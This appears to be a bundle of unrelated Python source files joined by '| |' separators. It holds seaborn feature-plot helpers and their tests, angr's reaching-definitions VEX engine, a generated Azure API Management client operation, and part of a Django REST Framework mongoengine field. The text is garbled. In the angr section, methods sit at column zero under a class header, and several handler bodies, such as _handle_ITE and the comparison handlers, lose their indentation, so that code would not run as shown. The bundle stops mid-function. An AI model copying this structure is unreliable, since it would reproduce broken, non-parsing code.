    if axis == 1:
        lst = chunklist(features, nfuncs, ncols, axis)
        m, n = nrows, ncols * nfuncs
        return reshape(lst, ncols=n, nrows=m)
    elif axis == 0:
        lst = chunklist(features, nfuncs, ncols, axis=0)
        m, n = nrows * nfuncs, ncols
        return reshape(lst, ncols=n, nrows=m)
def featureplots(df, nrows=1, ncols=1, figsize=(4, 4),
                 plotfuncs=(sns.violinplot,), axis=1, **kwargs):
    """Plot the dataframe features.
    Use Matplotlib to plot individual features across columns.

    Generalization of featureplot(): several plotting functions can be
    applied per feature; `axis` controls whether functions repeat along
    rows (1) or columns (0). `figsize` is the per-axis size.
    """
    width, height = figsize
    # Get list of functions
    funcs = tile_funcs(plotfuncs, nrows, ncols, axis)
    funclst = funcs.flatten()
    # Get the list of features
    featlst = tile_features(df.columns, len(plotfuncs), nrows, ncols, axis).flatten()
    # Get rowise list of axes
    m, n = funcs.shape
    fig, axes = plt.subplots(nrows, ncols, figsize=(width * n, height * m));
    if m == 1 and n == 1:
        axes = [axes]
    # NOTE(review): flattening is keyed on m>1 and ncols>1; confirm a grid
    # with m>1 but ncols==1 iterates as intended (a 1-D axes array does).
    if m > 1 and ncols > 1:
        axes = chain.from_iterable(axes) # flatten the nested list
    for feature, ax, func in zip(featlst, axes, funclst):
        func(feature, data=df, ax=ax, **kwargs)
    plt.tight_layout()
## - using Seaborn and long form data (5 times slower than featureplot)
def featureplot2(df, ncols=1, size=5, aspect=0.5, plotfunc=sns.violinplot,
                 hook=None, **map_kwargs):
    """Plot the dataframe features.
    Transform the input dataframe to long form and use
    Seaborn's FacetGrid to plot individual features accross columns.

    `hook`, when given, is applied to the resulting FacetGrid before it
    is returned (e.g. for further styling). About 5x slower than
    featureplot().
    """
    df = df.copy()
    # FacetGrid needs a named column variable to facet on.
    if df.columns.name is None:
        feature = df.columns.name = 'col'
    else:
        feature = df.columns.name
    # Transform input dataframe to long form data
    lf = df.stack().reset_index(name="value")
    # Drop the synthetic index columns created by reset_index().
    lf = lf.drop([c for c in lf.columns if c.startswith('level_')], axis=1)
    # Visualize with Seaborn
    g = sns.FacetGrid(lf, col=feature, hue=feature,
                      sharex=False, sharey=False, col_wrap=ncols,
                      size=size, aspect=aspect)
    h = g.map(plotfunc, "value", **map_kwargs).set_titles("{col_name}")
    if hook is not None:
        h = hook(h)
    return h
def test_reshape1():
    """Conformable data reshapes exactly like numpy's own reshape."""
    expected = np.arange(12).reshape((-1, 3))
    assert np.all(reshape(np.arange(12), 3) == expected)
def test_reshape2():
    """Not enough data: the output is padded with trailing zeros."""
    q = list(range(10)) + [0, 0]
    # The original called reshape(3, force=True) — dropping the data
    # argument entirely — and compared a (4, 3) array against a flat
    # 12-element list, which cannot broadcast.
    res = reshape(list(range(10)), ncols=3, force=True)
    assert np.all(res == np.array(q).reshape((-1, 3)))
def test_reshape3():
    """Too much data: the extra trailing values are chopped off."""
    q = list(range(12))
    # Use assert + np.all instead of `return all(...)`: a returned value is
    # ignored by test runners, and builtin all() over a 2-D element-wise
    # comparison is ambiguous.
    assert np.all(reshape(q, nrows=2, ncols=3, force=True)
                  == np.arange(6).reshape((2, 3)))
def test_tile_features_axis1():
    """axis=1: each feature is repeated nfuncs times along the rows."""
    result = tile_features(list('abcdef'), nfuncs=2, ncols=3, nrows=2, axis=1)
    expected = np.array([['a', 'a', 'b', 'b', 'c', 'c'],
                         ['d', 'd', 'e', 'e', 'f', 'f']])
    assert np.all(result == expected)
def test_tile_features_axis0():
    """axis=0: each row of features is repeated nfuncs times column-wise."""
    result = tile_features(list('abcdef'), nfuncs=2, ncols=3, nrows=2, axis=0)
    expected = np.array([['a', 'b', 'c'],
                         ['a', 'b', 'c'],
                         ['d', 'e', 'f'],
                         ['d', 'e', 'f']])
    assert np.all(result == expected)
| |
import logging
import struct
import pyvex
from .atoms import Register, MemoryLocation, Parameter
from .constants import OP_BEFORE, OP_AFTER
from .dataset import DataSet
from .external_codeloc import ExternalCodeLocation
from .undefined import Undefined
from ...engines.light import SimEngineLightVEX, SpOffset
from ...engines.vex.irop import operations as vex_operations
from ...errors import SimEngineError
l = logging.getLogger('angr.analyses.reaching_definitions.engine_vex')
class SimEngineRDVEX(SimEngineLightVEX): # pylint:disable=abstract-method
def __init__(self, current_local_call_depth, maximum_local_call_depth, function_handler=None):
    """Set up the reaching-definitions VEX engine.

    :param current_local_call_depth: Call depth accumulated so far.
    :param maximum_local_call_depth: Limit on how deep local calls are followed.
    :param function_handler:         Optional handler for function calls.
    """
    super(SimEngineRDVEX, self).__init__()
    self._function_handler = function_handler
    self._maximum_local_call_depth = maximum_local_call_depth
    self._current_local_call_depth = current_local_call_depth
def process(self, state, *args, **kwargs):
    """Run the analysis over one block and return the resulting state.

    :param state: The reaching-definitions state to process.
    Keyword arguments consumed: `block` (the block to process) and
    `fail_fast` (re-raise SimEngineError instead of logging it).
    """
    # we are using a completely different state. Therefore, we directly call our _process() method before
    # SimEngine becomes flexible enough.
    try:
        self._process(state, None, block=kwargs.pop('block', None))
    except SimEngineError as e:
        if kwargs.pop('fail_fast', False) is True:
            raise e
        else:
            # Best effort: log and fall through with whatever state we have.
            l.error(e)
    return self.state
#
# Private methods
#
@staticmethod
def _external_codeloc():
    # Code location used for definitions that originate outside the
    # analyzed code (e.g. values set up by the environment).
    return ExternalCodeLocation()
#
# VEX statement handlers
#
def _handle_Stmt(self, stmt):
    """Dispatch one VEX statement, notifying the owning analysis (when
    present) both before and after the statement is processed."""
    if self.state.analysis:
        self.state.analysis.observe(self.ins_addr, stmt, self.block, self.state, OP_BEFORE)
    super(SimEngineRDVEX, self)._handle_Stmt(stmt)
    if self.state.analysis:
        self.state.analysis.observe(self.ins_addr, stmt, self.block, self.state, OP_AFTER)
# e.g. PUT(rsp) = t2, t2 might include multiple values
def _handle_Put(self, stmt):
    """Handle a register PUT: kill old definitions of the register and
    record a new definition with the written data."""
    reg_offset = stmt.offset
    # result_size() is in bits; use floor division so the byte size stays
    # an int under Python 3 as well (`/ 8` would produce a float there).
    size = stmt.data.result_size(self.tyenv) // 8
    reg = Register(reg_offset, size)
    data = self._expr(stmt.data)
    if any(type(d) is Undefined for d in data):
        l.info('Data to write into register <%s> with offset %d undefined, ins_addr = %#x.',
               self.arch.register_names[reg_offset], reg_offset, self.ins_addr)
    self.state.kill_and_add_definition(reg, self._codeloc(), data)
# e.g. STle(t6) = t21, t6 and/or t21 might include multiple values
# sync with _handle_StoreG()
def _handle_Store(self, stmt):
    """Handle a memory store: for every resolvable address, kill old
    definitions at that location and record the new data."""
    addr = self._expr(stmt.addr)
    # result_size() is in bits; floor division keeps the byte size an int
    # under Python 3 as well (`/ 8` would produce a float there).
    size = stmt.data.result_size(self.tyenv) // 8
    data = self._expr(stmt.data)
    for a in addr:
        if type(a) is Undefined:
            l.info('Memory address undefined, ins_addr = %#x.', self.ins_addr)
        else:
            if any(type(d) is Undefined for d in data):
                l.info('Data to write at address %#x undefined, ins_addr = %#x.', a, self.ins_addr)
            memloc = MemoryLocation(a, size)
            # different addresses are not killed by a subsequent iteration, because kill only removes entries
            # with same index and same size
            self.state.kill_and_add_definition(memloc, self._codeloc(), data)
# sync with _handle_Store()
def _handle_StoreG(self, stmt):
    """Handle a guarded store: store when the guard is definitely True,
    skip when definitely False, and conservatively merge the old memory
    contents with the new data when the guard is undecided."""
    guard = self._expr(stmt.guard)
    if guard.data == {True}:
        self._handle_Store(stmt)
    elif guard.data == {False}:
        pass
    else:
        # guard.data == {True, False}
        addr = self._expr(stmt.addr)
        # NOTE(review): `/ 8` is integer division only under Python 2 (this
        # module uses `long` elsewhere); confirm before porting to Python 3.
        size = stmt.data.result_size(self.tyenv) / 8
        # get current data
        load_end = stmt.end
        load_ty = self.tyenv.lookup(stmt.data.tmp)
        load_addr = stmt.addr
        load_expr = pyvex.IRExpr.Load(load_end, load_ty, load_addr)
        data_old = self._handle_Load(load_expr)
        # get new data
        data_new = self._expr(stmt.data)
        # merge old and new data
        data_new.update(data_old)
        for a in addr:
            if type(a) is Undefined:
                l.info('Memory address undefined, ins_addr = %#x.', self.ins_addr)
            else:
                if any(type(d) is Undefined for d in data_new):
                    l.info('Data to write at address %#x undefined, ins_addr = %#x.', a, self.ins_addr)
                memloc = MemoryLocation(a, size)
                # different addresses are not killed by a subsequent iteration, because kill only removes entries
                # with same index and same size
                self.state.kill_and_add_definition(memloc, self._codeloc(), data_new)
def _handle_LoadG(self, stmt):
    """Handle a guarded load: load when the guard is definitely True, use
    the alternative value when definitely False, and merge both
    possibilities when the guard is undecided."""
    guard = self._expr(stmt.guard)
    if guard.data == {True}:
        # FIXME: full conversion support
        if stmt.cvt.find('Ident') < 0:
            l.warning('Unsupported conversion %s in LoadG.', stmt.cvt)
        # Rewrite as an unconditional load into the destination tmp.
        load_expr = pyvex.expr.Load(stmt.end, stmt.cvt_types[1], stmt.addr)
        wr_tmp_stmt = pyvex.stmt.WrTmp(stmt.dst, load_expr)
        self._handle_WrTmp(wr_tmp_stmt)
    elif guard.data == {False}:
        # Guard is false: the destination tmp gets the alternative value.
        wr_tmp_stmt = pyvex.stmt.WrTmp(stmt.dst, stmt.alt)
        self._handle_WrTmp(wr_tmp_stmt)
    else:
        if stmt.cvt.find('Ident') < 0:
            l.warning('Unsupported conversion %s in LoadG.', stmt.cvt)
        # Undecided guard: the tmp may hold either the loaded value or the
        # alternative, so record the union of both.
        load_expr = pyvex.expr.Load(stmt.end, stmt.cvt_types[1], stmt.addr)
        data = set()
        data.update(self._expr(load_expr).data)
        data.update(self._expr(stmt.alt).data)
        self._handle_WrTmpData(stmt.dst, DataSet(data, load_expr.result_size(self.tyenv)))
def _handle_Exit(self, stmt):
    # Intentionally a no-op: Exit statements add no definitions to track.
    pass

def _handle_IMark(self, stmt):
    # Intentionally a no-op: instruction markers are metadata only.
    pass

def _handle_AbiHint(self, stmt):
    # Intentionally a no-op: ABI hints do not affect reaching definitions.
    pass
#
# VEX expression handlers
#
def _handle_RdTmp(self, expr):
    """Return the tracked value of VEX temporary `expr.tmp`, or an
    Undefined DataSet when the temporary was never written."""
    tmp_no = expr.tmp
    if tmp_no not in self.tmps:
        return DataSet(Undefined(), expr.result_size(self.tyenv))
    return self.tmps[tmp_no]
# e.g. t0 = GET:I64(rsp), rsp might be defined multiple times
def _handle_Get(self, expr):
    """Handle a register GET: union the data of every current definition
    of the register, record the use, and return the result."""
    reg_offset = expr.offset
    size = expr.result_size(self.tyenv)
    # FIXME: size, overlapping
    data = set()
    current_defs = self.state.register_definitions.get_objects_by_offset(reg_offset)
    for current_def in current_defs:
        data.update(current_def.data)
    # No reaching definition at all: the register value is unknown.
    if len(data) == 0:
        data.add(Undefined())
    if any(type(d) is Undefined for d in data):
        l.info('Data in register <%s> with offset %d undefined, ins_addr = %#x.',
               self.arch.register_names[reg_offset], reg_offset, self.ins_addr)
    self.state.add_use(Register(reg_offset, size), self._codeloc())
    return DataSet(data, expr.result_size(self.tyenv))
# e.g. t27 = LDle:I64(t9), t9 might include multiple values
# caution: Is also called from StoreG
    def _handle_Load(self, expr):
        """Evaluate a memory load. For each candidate address, prefer tracked
        memory definitions; otherwise fall back to reading the mapped binary
        through the loader (4- or 8-byte little/big-endian ints only).

        NOTE: '/' below is integer division — this module targets Python 2
        (it also uses the `long` builtin).
        """
        addr = self._expr(expr.addr)
        size = expr.result_size(self.tyenv) / 8
        data = set()
        for a in addr:
            if isinstance(a, (int, long)):
                current_defs = self.state.memory_definitions.get_objects_by_offset(a)
                if current_defs:
                    # Address was written during the analysis: union the data
                    # of every reaching memory definition.
                    for current_def in current_defs:
                        data.update(current_def.data)
                    if any(type(d) is Undefined for d in data):
                        l.info('Memory at address %#x undefined, ins_addr = %#x.', a, self.ins_addr)
                else:
                    # No tracked definition: read the static bytes from the
                    # loaded binary, if the address is mapped.
                    mem = self.state.loader.memory.read_bytes(a, size)
                    if mem:
                        if self.arch.memory_endness == 'Iend_LE':
                            fmt = "<"
                        else:
                            fmt = ">"
                        if size == 8:
                            fmt += "Q"
                        elif size == 4:
                            fmt += "I"
                        # Only well-formed 4/8-byte reads are decoded; other
                        # sizes fall through and contribute nothing.
                        if size in [4, 8] and size == len(mem):
                            mem_str = ''.join(mem)
                            data.add(struct.unpack(fmt, mem_str)[0])
                # FIXME: _add_memory_use() iterates over the same loop
                self.state.add_use(MemoryLocation(a, size), self._codeloc())
            else:
                # Non-concrete address (Undefined/Parameter/...): cannot load.
                l.info('Memory address undefined, ins_addr = %#x.', self.ins_addr)
        if len(data) == 0:
            data.add(Undefined())
        return DataSet(data, expr.result_size(self.tyenv))
# CAUTION: experimental
def _handle_ITE(self, expr):
cond = self._expr(expr.cond)
if cond.data == {True}:
return self._expr(expr.iftrue)
elif cond.data == {False}:
return self._expr(expr.iffalse)
else:
if cond.data != {True, False}:
l.info('Could not resolve condition %s for ITE.', str(cond))
data = set()
data.update(self._expr(expr.iftrue).data)
data.update(self._expr(expr.iffalse).data)
return DataSet(data, expr.result_size(self.tyenv))
#
# Unary operation handlers
#
def _handle_Const(self, expr):
return DataSet(expr.con.value, expr.result_size(self.tyenv))
    def _handle_Conversion(self, expr):
        """Handle a width conversion (e.g. 64->32 truncation): ints are masked
        to the target width, Parameters are resized in place, anything else is
        passed through unchanged with a warning.

        NOTE(review): Parameter values are mutated in place (a.value.size /
        a.value.bits), so aliased references elsewhere observe the change —
        confirm this is intended.
        """
        simop = vex_operations[expr.op]
        arg_0 = self._expr(expr.args[0])
        bits = int(simop.op_attrs['to_size'])
        data = set()
        # convert operand if possible otherwise keep it unchanged
        for a in arg_0:
            if type(a) is Undefined:
                pass
            elif isinstance(a, (int, long)):
                # Truncate to the target bit width.
                mask = 2 ** bits - 1
                a &= mask
            elif type(a) is Parameter:
                if type(a.value) is Register:
                    # Python 2 integer division: bits -> bytes.
                    a.value.size = bits / 8
                elif type(a.value) is SpOffset:
                    a.value.bits = bits
                else:
                    l.warning('Unsupported type Parameter->%s for conversion.', type(a.value).__name__)
            else:
                l.warning('Unsupported type %s for conversion.', type(a).__name__)
            data.add(a)
        return DataSet(data, expr.result_size(self.tyenv))
def _handle_Not1(self, expr):
arg0 = expr.args[0]
expr_0 = self._expr(arg0)
if len(expr_0) == 1:
e0 = expr_0.get_first_element()
if isinstance(e0, (int, long)):
return DataSet(e0 != 1, expr.result_size(self.tyenv))
l.warning('Comparison of multiple values / different types.')
return DataSet({True, False}, expr.result_size(self.tyenv))
def _handle_Not(self, expr):
arg0 = expr.args[0]
expr_0 = self._expr(arg0)
if len(expr_0) == 1:
e0 = expr_0.get_first_element()
if isinstance(e0, (int, long)):
return DataSet(e0 == 0, expr.result_size(self.tyenv))
l.warning('Comparison of multiple values / different types.')
return DataSet({True, False}, expr.result_size(self.tyenv))
#
# Binary operation handlers
#
    def _handle_Sar(self, expr):
        """Arithmetic shift right over the cross product of both operand sets.

        Emulates sign extension on unsigned size-bit values: if the top bit of
        e0 is clear the shift is plain; otherwise the vacated e1 high bits are
        filled with ones. Non-integer operands yield Undefined.
        """
        arg0, arg1 = expr.args
        expr_0 = self._expr(arg0)
        expr_1 = self._expr(arg1)
        size = expr.result_size(self.tyenv)
        data = set()
        for e0 in expr_0:
            for e1 in expr_1:
                try:
                    if e0 >> (size - 1) == 0:
                        # Sign bit clear: logical and arithmetic shift agree.
                        head = 0
                    else:
                        # Sign bit set: replicate it into the top e1 bits.
                        head = ((1 << e1) - 1) << (size - e1)
                    data.add(head | (e0 >> e1))
                except (ValueError, TypeError) as e:
                    # e0/e1 not shiftable (Undefined, Parameter, ...).
                    data.add(Undefined())
                    l.warning(e)
        return DataSet(data, expr.result_size(self.tyenv))
def _handle_CmpEQ(self, expr):
arg0, arg1 = expr.args
expr_0 = self._expr(arg0)
expr_1 = self._expr(arg1)
if len(expr_0) == 1 and len(expr_1) == 1:
e0 = expr_0.get_first_element()
e1 = expr_1.get_first_element()
if isinstance(e0, (int, long)) and isinstance(e1, (int, long)):
return DataSet(e0 == e1, expr.result_size(self.tyenv))
l.warning('Comparison of multiple values / different types.')
return DataSet({True, False}, expr.result_size(self.tyenv))
def _handle_CmpNE(self, expr):
arg0, arg1 = expr.args
expr_0 = self._expr(arg0)
expr_1 = self._expr(arg1)
if len(expr_0) == 1 and len(expr_1) == 1:
e0 = expr_0.get_first_element()
e1 = expr_1.get_first_element()
if isinstance(e0, (int, long)) and isinstance(e1, (int, long)):
return DataSet(e0 != e1, expr.result_size(self.tyenv))
l.warning('Comparison of multiple values / different types.')
return DataSet({True, False}, expr.result_size(self.tyenv))
def _handle_CmpLT(self, expr):
arg0, arg1 = expr.args
expr_0 = self._expr(arg0)
expr_1 = self._expr(arg1)
if len(expr_0) == 1 and len(expr_1) == 1:
e0 = expr_0.get_first_element()
e1 = expr_1.get_first_element()
if isinstance(e0, (int, long)) and isinstance(e1, (int, long)):
return DataSet(e0 < e1, expr.result_size(self.tyenv))
l.warning('Comparison of multiple values / different types.')
return DataSet({True, False}, expr.result_size(self.tyenv))
# ppc only
    # ppc only
    def _handle_CmpORD(self, expr):
        """PPC ordered compare: 0x08 if lhs < rhs, 0x04 if lhs > rhs,
        0x02 if equal.

        NOTE(review): the unresolvable fallback returns {True, False} like the
        boolean comparisons, although this operation otherwise produces the
        integers {0x08, 0x04, 0x02} — confirm downstream consumers expect
        booleans here.
        """
        arg0, arg1 = expr.args
        expr_0 = self._expr(arg0)
        expr_1 = self._expr(arg1)
        if len(expr_0) == 1 and len(expr_1) == 1:
            e0 = expr_0.get_first_element()
            e1 = expr_1.get_first_element()
            if isinstance(e0, (int, long)) and isinstance(e1, (int, long)):
                if e0 < e1:
                    return DataSet(0x08, expr.result_size(self.tyenv))
                elif e0 > e1:
                    return DataSet(0x04, expr.result_size(self.tyenv))
                else:
                    return DataSet(0x02, expr.result_size(self.tyenv))
        l.warning('Comparison of multiple values / different types.')
        return DataSet({True, False}, expr.result_size(self.tyenv))
def _handle_CCall(self, expr):
return DataSet(Undefined(), expr.result_size(self.tyenv))
#
# User defined high level statement handlers
#
    def _handle_function(self):
        """Handle a call: resolve the callee from the (single) IP definition,
        dispatch to a user-supplied function handler, and — if no handler ran
        a nested analysis — model the implicit return-address pop by bumping SP.

        Always returns None; effects are applied to self.state.
        """
        # Guard against unbounded recursion into local callees.
        if self._current_local_call_depth > self._maximum_local_call_depth:
            l.warning('The analysis reached its maximum recursion depth.')
            return None
        # The call target must be a single, concrete IP value.
        defs_ip = self.state.register_definitions.get_objects_by_offset(self.arch.ip_offset)
        if len(defs_ip) != 1:
            l.error('Invalid definition(s) for IP.')
            return None
        ip_data = next(iter(defs_ip)).data
        if len(ip_data) != 1:
            l.error('Invalid number of values for IP.')
            return None
        ip_addr = ip_data.get_first_element()
        if not isinstance(ip_addr, (int, long)):
            l.error('Invalid type %s for IP.', type(ip_addr).__name__)
            return None
        # Classify the target: a PLT stub or out-of-binary symbol is an
        # external function; otherwise it is a local (internal) function.
        is_internal = False
        ext_func_name = None
        if self.state.loader.main_object.contains_addr(ip_addr) is True:
            ext_func_name = self.state.loader.find_plt_stub_name(ip_addr)
            if ext_func_name is None:
                is_internal = True
        else:
            symbol = self.state.loader.find_symbol(ip_addr)
            if symbol is not None:
                ext_func_name = symbol.name
        # executed_rda tells us whether a handler already performed a nested
        # reaching-definitions analysis (which would have handled the return).
        executed_rda = False
        if ext_func_name is not None:
            handler_name = 'handle_%s' % ext_func_name
            if hasattr(self._function_handler, handler_name):
                executed_rda, state = getattr(self._function_handler, handler_name)(self.state, self._codeloc())
                self.state = state
            else:
                l.warning('Please implement the external function handler for %s() with your own logic.', ext_func_name)
                # Fall back to a generic external-function handler if provided.
                handler_name = 'handle_external_function_fallback'
                if hasattr(self._function_handler, handler_name):
                    executed_rda, state = getattr(self._function_handler, handler_name)(self.state, self._codeloc())
                    self.state = state
        elif is_internal is True:
            handler_name = 'handle_local_function'
            if hasattr(self._function_handler, handler_name):
                executed_rda, state = getattr(self._function_handler, handler_name)(self.state,
                                                                                    ip_addr,
                                                                                    self._current_local_call_depth + 1,
                                                                                    self._maximum_local_call_depth,
                                                                                    self._codeloc(),
                                                                                    )
                self.state = state
            else:
                l.warning('Please implement the local function handler with your own logic.')
        else:
            l.warning('Could not find function name for external function at address %#x.', ip_addr)
        # pop return address if necessary
        if executed_rda is False and self.arch.call_pushes_ret is True:
            defs_sp = self.state.register_definitions.get_objects_by_offset(self.arch.sp_offset)
            if len(defs_sp) == 0:
                raise ValueError('No definition for SP found')
            elif len(defs_sp) == 1:
                # Single definition: take its DataSet's underlying value set.
                sp_data = next(iter(defs_sp)).data.data
            else:  # len(defs_sp) > 1
                # Multiple definitions: union their values.
                sp_data = set()
                for d in defs_sp:
                    sp_data.update(d.data)
            if len(sp_data) != 1:
                raise ValueError('Invalid number of values for SP')
            sp_addr = next(iter(sp_data))
            if not isinstance(sp_addr, (int, long)):
                raise TypeError('Invalid type %s for SP' % type(sp_addr).__name__)
            # Undo the push of the return address (stack_change is negative
            # for descending stacks, hence the subtraction grows SP back).
            atom = Register(self.arch.sp_offset, self.arch.bytes)
            sp_addr -= self.arch.stack_change
            self.state.kill_and_add_definition(atom, self._codeloc(), DataSet(sp_addr, self.arch.bits))
        return None
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
# Callback signature accepted by operations: receives the raw pipeline
# response, the deserialized body, and the response headers.
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
# Module-level serializer shared by the request builders; client-side
# validation is turned off (the service validates on its side).
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_request(
    resource_group_name: str,
    service_name: str,
    product_id: str,
    subscription_id: str,
    *,
    filter: Optional[str] = None,
    top: Optional[int] = None,
    skip: Optional[int] = None,
    **kwargs: Any
) -> HttpRequest:
    """Construct the GET request that lists the subscriptions of a product.

    Path parameters are validated and substituted into the URL template;
    the optional OData query parameters ($filter/$top/$skip) are attached
    only when supplied, followed by the mandatory api-version.
    """
    api_version = "2021-08-01"
    accept = "application/json"
    # Resolve the URL template; callers may override it (e.g. with a paging
    # next_link) through the 'template_url' kwarg.
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/products/{productId}/subscriptions')
    path_args = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        "serviceName": _SERIALIZER.url("service_name", service_name, 'str', max_length=50, min_length=1, pattern=r'^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'),
        "productId": _SERIALIZER.url("product_id", product_id, 'str', max_length=256, min_length=1),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
    }
    url = _format_url_section(url, **path_args)
    # Optional OData query parameters.
    query = kwargs.pop("params", {})  # type: Dict[str, Any]
    if filter is not None:
        query['$filter'] = _SERIALIZER.query("filter", filter, 'str')
    if top is not None:
        query['$top'] = _SERIALIZER.query("top", top, 'int', minimum=1)
    if skip is not None:
        query['$skip'] = _SERIALIZER.query("skip", skip, 'int', minimum=0)
    query['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
    # Headers: this operation only negotiates the response content type.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
    return HttpRequest(
        method="GET",
        url=url,
        params=query,
        headers=headers,
        **kwargs
    )
class ProductSubscriptionsOperations(object):
    """ProductSubscriptionsOperations operations.
    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.
    :ivar models: Alias to model classes used in this operation group.
    :type models: ~api_management_client.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    models = _models
    def __init__(self, client, config, serializer, deserializer):
        # Dependencies are injected by the generated service client;
        # no I/O happens at construction time.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    @distributed_trace
    def list(
        self,
        resource_group_name: str,
        service_name: str,
        product_id: str,
        filter: Optional[str] = None,
        top: Optional[int] = None,
        skip: Optional[int] = None,
        **kwargs: Any
    ) -> Iterable["_models.SubscriptionCollection"]:
        """Lists the collection of subscriptions to the specified product.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param service_name: The name of the API Management service.
        :type service_name: str
        :param product_id: Product identifier. Must be unique in the current API Management service
         instance.
        :type product_id: str
        :param filter: |   Field     |     Usage     |     Supported operators     |     Supported
         functions     |</br>|-------------|-------------|-------------|-------------|</br>| name |
         filter | ge, le, eq, ne, gt, lt | substringof, contains, startswith, endswith |</br>|
         displayName | filter | ge, le, eq, ne, gt, lt | substringof, contains, startswith, endswith
         |</br>| stateComment | filter | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
         endswith |</br>| ownerId | filter | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
         endswith |</br>| scope | filter | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
         endswith |</br>| userId | filter | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
         endswith |</br>| productId | filter | ge, le, eq, ne, gt, lt | substringof, contains,
         startswith, endswith |</br>| state | filter | eq |     |</br>| user | expand |     |
         |</br>.
        :type filter: str
        :param top: Number of records to return.
        :type top: int
        :param skip: Number of records to skip.
        :type skip: int
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either SubscriptionCollection or the result of
         cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~api_management_client.models.SubscriptionCollection]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.SubscriptionCollection"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            # First page: build the request from the operation's URL template.
            # Subsequent pages: reuse the same parameters against the
            # service-provided next_link.
            if not next_link:
                request = build_list_request(
                    resource_group_name=resource_group_name,
                    service_name=service_name,
                    product_id=product_id,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    top=top,
                    skip=skip,
                    template_url=self.list.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_request(
                    resource_group_name=resource_group_name,
                    service_name=service_name,
                    product_id=product_id,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    top=top,
                    skip=skip,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request
        def extract_data(pipeline_response):
            # Deserialize one page and hand back (next_link, items) to ItemPaged.
            deserialized = self._deserialize("SubscriptionCollection", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Execute one page request; anything but 200 is raised as an error.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/products/{productId}/subscriptions'}  # type: ignore
| |
from django.core.exceptions import ValidationError
from django.utils.encoding import smart_str
from django.utils.translation import ugettext_lazy as _
from rest_framework import serializers
from bson.errors import InvalidId
from mongoengine import dereference
from mongoengine.base.document import BaseDocument
from mongoengine.document import Document
from mongoengine.fields import ObjectId
class DocumentField(serializers.Field):
    """
    Base field for Mongoengine fields that we can not convert to DRF fields.
    To Users:
        - You can subclass DocumentField to implement custom (de)serialization
    """
    type_label = 'DocumentField'
    def __init__(self, *args, **kwargs):
        try:
            self.model_field = kwargs.pop('model_field')
        except KeyError:
            raise ValueError("%s requires 'model_field' kwarg" % self.type_label)
        super(DocumentField, self).__init__(*args, **kwargs)
    def transform_document(self, document, depth):
        # Serialize every declared field that is present on the instance,
        # skipping fields whose transformed value is None.
        data = {}
        for field_name in document._fields:
            if not hasattr(document, smart_str(field_name)):
                continue
            raw_value = getattr(document, field_name)
            transformed = self.transform_object(raw_value, depth - 1)
            if transformed is not None:
                data[field_name] = transformed
        return data
    def transform_dict(self, obj, depth):
        # Each dict value consumes one level of recursion depth.
        return {key: self.transform_object(val, depth - 1)
                for key, val in obj.items()}
    def transform_object(self, obj, depth):
        """
        Models to natives
        Recursion for (embedded) objects
        """
        if isinstance(obj, BaseDocument):
            # Document, EmbeddedDocument
            if depth == 0:
                # Recursion budget exhausted: fall back to the primary key.
                return smart_str(getattr(obj, 'pk', 'Max recursion depth exceeded'))
